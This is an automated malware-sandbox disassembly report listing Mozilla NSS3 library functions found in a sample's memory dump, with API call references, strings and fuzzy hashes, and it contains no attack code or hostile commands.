Opcode Fuzzy Hash: d8bbef437dbd8519baca9c838b714b4beed618189cd2ee4360db63a3ebb48ace
Instruction Fuzzy Hash: 46818471908301AFE711CF28DA80B5A77E4AB84758F14893DF96CD7741E731DA06DB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C7F0470 Relevance: 21.2, APIs: 14, Instructions: 206timeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C7F04B7

Part of subcall function 6C840FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7E87ED,00000800,6C7DEF74,00000000), ref: 6C841000
Part of subcall function 6C840FF0: PR_NewLock.NSS3(?,00000800,6C7DEF74,00000000), ref: 6C841016
Part of subcall function 6C840FF0: PL_InitArenaPool.NSS3(00000000,security,6C7E87ED,00000008,?,00000800,6C7DEF74,00000000), ref: 6C84102B

PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7F0539

Part of subcall function 6C841200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7E88A4,00000000,00000000), ref: 6C841228
Part of subcall function 6C841200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C841238
Part of subcall function 6C841200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7E88A4,00000000,00000000), ref: 6C84124B
Part of subcall function 6C841200: PR_CallOnce.NSS3(6C942AA4,6C8412D0,00000000,00000000,00000000,?,6C7E88A4,00000000,00000000), ref: 6C84125D
Part of subcall function 6C841200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C84126F
Part of subcall function 6C841200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C841280
Part of subcall function 6C841200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C84128E
Part of subcall function 6C841200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C84129A
Part of subcall function 6C841200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C8412A1

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7F054A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7F056D
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7F05CA
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C7F05EA
PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C7F05FD
PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C7F0621
PR_EnterMonitor.NSS3 ref: 6C7F063E
PR_ExitMonitor.NSS3 ref: 6C7F0668
CERT_DestroyCertificate.NSS3(?), ref: 6C7F0697
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7F06AC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7F06CC
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7F06DA

Part of subcall function 6C7EE6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C7F04DC,?,?), ref: 6C7EE6C9
Part of subcall function 6C7EE6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C7F04DC,?,?), ref: 6C7EE6D9
Part of subcall function 6C7EE6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C7F04DC,?,?), ref: 6C7EE6F4
Part of subcall function 6C7EE6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7F04DC,?), ref: 6C7EE703
Part of subcall function 6C7EE6B0: CERT_FindCertIssuer.NSS3(?,?,6C7F04DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7EE71E

Part of subcall function 6C7EF660: PR_EnterMonitor.NSS3(6C7F050F,?,00000001,?,?,?), ref: 6C7EF6A8
Part of subcall function 6C7EF660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C7EF6C1
Part of subcall function 6C7EF660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C7EF7C8

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
String ID:
API String ID: 2470852775-0
Opcode ID: f01eeb6e5a2f7ba3528012bfd5fbfbd3aa80ef2eb0cc0f30bb5dde1758e7714f
Instruction ID: 4c75f30c799b3be49bc9c5c118c642d46b32b782c9ce24015504c3f70a4a7c5e
Opcode Fuzzy Hash: f01eeb6e5a2f7ba3528012bfd5fbfbd3aa80ef2eb0cc0f30bb5dde1758e7714f
Instruction Fuzzy Hash: EC61F271A083419BEB10CE68DE84F5B77E4AF84358F104938F96997791E730E91ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C8125C0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetSlotList), ref: 6C8125DD
PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6C81262A

Part of subcall function 6C8F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C8F0BAB
Part of subcall function 6C8F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C8F0BBA
Part of subcall function 6C8F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C8F0D7E

PR_LogPrint.NSS3( pSlotList = 0x%p,?), ref: 6C81260F

Part of subcall function 6C8F09D0: OutputDebugStringA.KERNEL32(?), ref: 6C8F0B88
Part of subcall function 6C8F09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8F0C5D
Part of subcall function 6C8F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C8F0C8D
Part of subcall function 6C8F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C8F0C9C
Part of subcall function 6C8F09D0: OutputDebugStringA.KERNEL32(?), ref: 6C8F0CD1
Part of subcall function 6C8F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C8F0CEC
Part of subcall function 6C8F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C8F0CFB
Part of subcall function 6C8F09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C8F0D16
Part of subcall function 6C8F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C8F0D26
Part of subcall function 6C8F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C8F0D35
Part of subcall function 6C8F09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C8F0D65
Part of subcall function 6C8F09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C8F0D70
Part of subcall function 6C8F09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C8F0D90
Part of subcall function 6C8F09D0: free.MOZGLUE(00000000), ref: 6C8F0D99

PR_LogPrint.NSS3( tokenPresent = 0x%x,?), ref: 6C8125F6

Part of subcall function 6C8F09D0: PR_Now.NSS3 ref: 6C8F0A22
Part of subcall function 6C8F09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C8F0A35
Part of subcall function 6C8F09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C8F0A66
Part of subcall function 6C8F09D0: PR_GetCurrentThread.NSS3 ref: 6C8F0A70
Part of subcall function 6C8F09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C8F0A9D
Part of subcall function 6C8F09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C8F0AC8
Part of subcall function 6C8F09D0: PR_vsmprintf.NSS3(?,?), ref: 6C8F0AE8
Part of subcall function 6C8F09D0: EnterCriticalSection.KERNEL32(?), ref: 6C8F0B19
Part of subcall function 6C8F09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C8F0B48
Part of subcall function 6C8F09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C8F0C76
Part of subcall function 6C8F09D0: PR_LogFlush.NSS3 ref: 6C8F0C7E

PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6C812699
PR_LogPrint.NSS3( slotID[%d] = %x,00000000,?), ref: 6C8126C5

Strings

pSlotList = 0x%p, xrefs: 6C81260A
C_GetSlotList, xrefs: 6C8125D8
slotID[%d] = %x, xrefs: 6C8126C0
*pulCount = 0x%x, xrefs: 6C812694
tokenPresent = 0x%x, xrefs: 6C8125F1
pulCount = 0x%p, xrefs: 6C812625

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Print$DebugOutputStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: *pulCount = 0x%x$ pSlotList = 0x%p$ pulCount = 0x%p$ slotID[%d] = %x$ tokenPresent = 0x%x$C_GetSlotList
API String ID: 2625801553-2918917633
Opcode ID: d10c2a0f3cae79788873e08e1d47320ad7f65701ccda80833d211e042862efa3
Instruction ID: 55e932b3df0f92a5418587fe9173142296850a93406aa0c14587885d6165b0cc
Opcode Fuzzy Hash: d10c2a0f3cae79788873e08e1d47320ad7f65701ccda80833d211e042862efa3
Instruction Fuzzy Hash: C131EF3130918AEFDB20EF58DE8CA4537F1BB9634DF148864E81483A52DB34EC44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6C7DAF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C7DAF47

Part of subcall function 6C8A9090: TlsGetValue.KERNEL32 ref: 6C8A90AB
Part of subcall function 6C8A9090: TlsGetValue.KERNEL32 ref: 6C8A90C9
Part of subcall function 6C8A9090: EnterCriticalSection.KERNEL32 ref: 6C8A90E5
Part of subcall function 6C8A9090: TlsGetValue.KERNEL32 ref: 6C8A9116
Part of subcall function 6C8A9090: LeaveCriticalSection.KERNEL32 ref: 6C8A913F

FreeLibrary.KERNEL32(?), ref: 6C7DAF6D
free.MOZGLUE(?), ref: 6C7DAFA4
free.MOZGLUE(?), ref: 6C7DAFAA
PR_ExitMonitor.NSS3 ref: 6C7DAFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C7DAFF5
PR_ExitMonitor.NSS3 ref: 6C7DB005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C7DB014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C7DB028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C7DB03C

Strings

%s decr => %d, xrefs: 6C7DAFF0
Unloaded library %s, xrefs: 6C7DB023

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 3f130540c75b72b8c5bef434c7e34fdf47326c5aeae7dc4a457c2389abb010b0
Instruction ID: 344bc614253c70db316b3ad1cc3381a57a2be8e3d28edbf956a68273b8a9aef8
Opcode Fuzzy Hash: 3f130540c75b72b8c5bef434c7e34fdf47326c5aeae7dc4a457c2389abb010b0
Instruction Fuzzy Hash: 543129B5B09110ABDB10AF64EE44A05B7B5FB4532CF298675EC0597A00F332F825C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6C838680 Relevance: 21.1, APIs: 14, Instructions: 91stringCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C7E55D0,00000000,00000000), ref: 6C83868B
PR_NewLock.NSS3(00000000,00000000), ref: 6C8386A0

Part of subcall function 6C8A98D0: calloc.MOZGLUE(00000001,00000084,6C7D0936,00000001,?,6C7D102C), ref: 6C8A98E5

PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C8386B2

Part of subcall function 6C7CBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C7D21BC), ref: 6C7CBB8C

PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C8386C8

Part of subcall function 6C7CBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C7CBBEB
Part of subcall function 6C7CBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C7CBBFB
Part of subcall function 6C7CBB80: GetLastError.KERNEL32 ref: 6C7CBC03
Part of subcall function 6C7CBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C7CBC19
Part of subcall function 6C7CBB80: free.MOZGLUE(00000000), ref: 6C7CBC22

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C8386E2
malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C8386EC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C838700
DeleteCriticalSection.KERNEL32(-0000000C,?,?,00000000,00000000), ref: 6C83871F
free.MOZGLUE(00000000,?,?,00000000,00000000), ref: 6C838726
DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,00000000), ref: 6C838743
free.MOZGLUE(?,?,?,?,00000000,00000000), ref: 6C83874A
DeleteCriticalSection.KERNEL32(-0000001C,?,00000000,00000000), ref: 6C838759
free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C838760
free.MOZGLUE(00000000,00000000,00000000), ref: 6C83876C

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: free$CriticalSection$DeleteErrorcalloc$Cond$CountInitializeLastLockSpinmallocstrcpystrlen
String ID:
API String ID: 1802479574-0
Opcode ID: 24fe22cb0c4599ce49294db86fca65fad7a8624905a8374779f76f81fa28394a
Instruction ID: 633543a3a4871da52eb80a141189af22d86ed444ee28d5a0a6f4b845f3f5e729
Opcode Fuzzy Hash: 24fe22cb0c4599ce49294db86fca65fad7a8624905a8374779f76f81fa28394a
Instruction Fuzzy Hash: 5D21D8F5B007126BEF206FB98D0D95B3AADAF422987141935F82EC7B41EB31D415C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C826C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C82781D,00000000,6C81BE2C,?,6C826B1D,?,?,?,?,00000000,00000000,6C82781D), ref: 6C826C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C82781D,?,6C81BE2C,?), ref: 6C826C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C82781D), ref: 6C826C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C826C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C826C96

Part of subcall function 6C7D1240: TlsGetValue.KERNEL32(00000040,?,6C7D116C,NSPR_LOG_MODULES), ref: 6C7D1267
Part of subcall function 6C7D1240: EnterCriticalSection.KERNEL32(?,?,?,6C7D116C,NSPR_LOG_MODULES), ref: 6C7D127C
Part of subcall function 6C7D1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C7D116C,NSPR_LOG_MODULES), ref: 6C7D1291
Part of subcall function 6C7D1240: PR_Unlock.NSS3(?,?,?,?,6C7D116C,NSPR_LOG_MODULES), ref: 6C7D12A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C826CAA

Strings

extern:, xrefs: 6C826C7E
NSS_DEFAULT_DB_TYPE, xrefs: 6C826C91
rdb:, xrefs: 6C826C69
dbm, xrefs: 6C826CA4
sql:, xrefs: 6C826C52
dbm:, xrefs: 6C826C3A

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: f4c3f59d010a13bb4d21cc13981a411a8e7266686758a2cbac59cd0578f8993b
Instruction ID: 67a58d2f8d990f6a5ab024505978af66ea67400b2db2eb39238a5632e7b930a8
Opcode Fuzzy Hash: f4c3f59d010a13bb4d21cc13981a411a8e7266686758a2cbac59cd0578f8993b
Instruction Fuzzy Hash: 8A01F2E170A31163E73037799E4EF22218C9F81659F290931FE48E09C1EBAAEA1440E5

Uniqueness

Uniqueness Score: -1.00%

Function 6C8325F0 Relevance: 19.9, APIs: 8, Strings: 5, Instructions: 403stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C83A0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C80A5DF,?,00000000,6C7E28AD,00000000,?,6C80A5DF,?,object), ref: 6C83A0C0
Part of subcall function 6C83A0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C80A5DF,?,00000000,6C7E28AD,00000000,?,6C80A5DF,?,object), ref: 6C83A0E8

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C832834
memcmp.VCRUNTIME140(00000000,00000020,00000020,?,?,?,?,?,?,?,?), ref: 6C83284B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C832A98
memcmp.VCRUNTIME140(00000000,?,00000020,?,?,?,?,?,?,?,?,?,?), ref: 6C832AAF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C832BDC
memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C832BF3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C832D23
memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?), ref: 6C832D34

Strings

serial, xrefs: 6C832AC2
manufacturer, xrefs: 6C83285E
model, xrefs: 6C832C06
token, xrefs: 6C8325FA
, xrefs: 6C832A8E, 6C832AAB

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: memcmpstrlen$strcmp
String ID: $manufacturer$model$serial$token
API String ID: 2407968032-2628435027
Opcode ID: dc889c75671e4a554b53c86415115a274800e06232d0dd67cfdd2d0cc95ee725
Instruction ID: 74fee41ba802ab7ff49c14cee56eccda11a8c9c97da7b61f6720d1f03928e7dd
Opcode Fuzzy Hash: dc889c75671e4a554b53c86415115a274800e06232d0dd67cfdd2d0cc95ee725
Instruction Fuzzy Hash: 3202D1A1D0C3ED6EFB3286A2C98CBD12AE05B0931DF4D39F5CA4D4BA93C6AC055593D1

Uniqueness

Uniqueness Score: -1.00%

Function 6C834E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C7F78F8), ref: 6C834E6D

Part of subcall function 6C7D09E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C7D06A2,00000000,?), ref: 6C7D09F8
Part of subcall function 6C7D09E0: malloc.MOZGLUE(0000001F), ref: 6C7D0A18
Part of subcall function 6C7D09E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C7D0A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C7F78F8), ref: 6C834ED9

Part of subcall function 6C825920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C827703,?,00000000,00000000), ref: 6C825942
Part of subcall function 6C825920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C827703), ref: 6C825954
Part of subcall function 6C825920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C82596A
Part of subcall function 6C825920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C825984
Part of subcall function 6C825920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C825999
Part of subcall function 6C825920: free.MOZGLUE(00000000), ref: 6C8259BA
Part of subcall function 6C825920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C8259D3
Part of subcall function 6C825920: free.MOZGLUE(00000000), ref: 6C8259F5
Part of subcall function 6C825920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C825A0A
Part of subcall function 6C825920: free.MOZGLUE(00000000), ref: 6C825A2E
Part of subcall function 6C825920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C825A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C7F78F8), ref: 6C834EB3

Part of subcall function 6C834820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C834EB8,?,?,?,?,?,?,?,?,?,?,6C7F78F8), ref: 6C83484C
Part of subcall function 6C834820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C834EB8,?,?,?,?,?,?,?,?,?,?,6C7F78F8), ref: 6C83486D
Part of subcall function 6C834820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C834EB8,?), ref: 6C834884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C7F78F8), ref: 6C834EC0

Part of subcall function 6C834470: TlsGetValue.KERNEL32(00000000,?,6C7F7296,00000000), ref: 6C834487
Part of subcall function 6C834470: EnterCriticalSection.KERNEL32(?,?,?,6C7F7296,00000000), ref: 6C8344A0
Part of subcall function 6C834470: PR_Unlock.NSS3(?,?,?,?,6C7F7296,00000000), ref: 6C8344BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7F78F8), ref: 6C834F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7F78F8), ref: 6C834F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C7F78F8), ref: 6C834F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7F78F8), ref: 6C834F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7F78F8), ref: 6C834F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7F78F8), ref: 6C834F8F
PK11_UpdateSlotAttribute.NSS3(?,6C90DCB0,00000000), ref: 6C834FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C83501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C7F78F8), ref: 6C83506B

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 993bf499d123a5255188eccdc40236ff795b014f4c926924e053d2995b616fde
Instruction ID: 0875a2c36052a0a63c5e18a5472c79d1c7d6b1f1c1fe4584652fa8b6352f5d51
Opcode Fuzzy Hash: 993bf499d123a5255188eccdc40236ff795b014f4c926924e053d2995b616fde
Instruction Fuzzy Hash: EA5137B1D006219BDB21AF68EE44A9B3AB4FF4531CF186A35EC0E96B01F732D554C6D2

Uniqueness

Uniqueness Score: -1.00%

Function 6C7DACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7DACE2
malloc.MOZGLUE(00000001), ref: 6C7DACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C7DAD02
TlsGetValue.KERNEL32 ref: 6C7DAD3C
calloc.MOZGLUE(00000001,?), ref: 6C7DAD8C
